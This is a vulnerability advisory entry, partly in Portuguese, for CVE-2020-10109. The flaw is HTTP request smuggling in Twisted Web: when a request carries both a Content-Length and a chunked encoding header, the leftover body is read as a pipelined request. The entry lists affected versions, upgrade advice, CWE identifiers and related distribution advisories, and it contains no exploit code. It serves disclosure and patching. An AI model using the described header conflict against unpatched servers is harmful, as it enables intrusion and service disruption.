PT-2019-5690 · Twisted+6 · Twisted Web+6

Jake Miller

Publicado

2019-05-12

Atualizado

2025-03-26

CVE-2020-10109

CVSS v2.0

Crítica

Vetor

AV:N/AC:L/Au:N/C:C/I:C/A:C

Name of the Vulnerable Software and Affected Versions Twisted Web versions 19.10.0 and earlier Twisted Web versions prior to 20.3.0

Description The issue is related to an HTTP request splitting vulnerability in Twisted Web. When a content-length and a chunked encoding header are present, the content-length takes precedence, and the remainder of the request body is interpreted as a pipelined request. This vulnerability is associated with insufficient input validation when processing HTTP headers, which could allow a remote attacker to cause a denial of service.

Recommendations For Twisted Web versions 19.10.0 and earlier, update to a version later than 19.10.0 to resolve the issue. For Twisted Web versions prior to 20.3.0, update to a version later than 20.3.0 to resolve the issue. As a temporary workaround, consider restricting the use of the content-length and chunked encoding headers in HTTP requests to minimize the risk of exploitation.

Exploit

Correção

HTTP Request/Response Smuggling

RCE

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

dbugs@ptsecurity.com

Enumeração de Fraquezas

CWE-444CWE-20

Identificadores relacionados

AZL-6820

BDU:2020-05699

CESA-2020_1561

CVE-2020-10109

DLA-2145-1

DLA-2145-2

DLA-2927-1

GHSA-P5XH-VX83-MXCJ

MGASA-2020-0428

OPENSUSE-SU-2022_2822-1

OPENSUSE-SU-2024:11041-1

PYSEC-2020-260

RHSA-2020:1561

RHSA-2020_1561

SUSE-SU-2022:2811-1

SUSE-SU-2022:2822-1

SUSE-SU-2022_2822-1

USN-4308-1

USN-4308-2

Produtos afetados

Astra Linux

Centos

Red Hat

Red Os

Suse

Twisted Web

Ubuntu

PT-2019-5690 · Twisted+6 · Twisted Web+6

CVE-2020-10109

Enumeração de Fraquezas

Identificadores relacionados

Produtos afetados

Referências · 77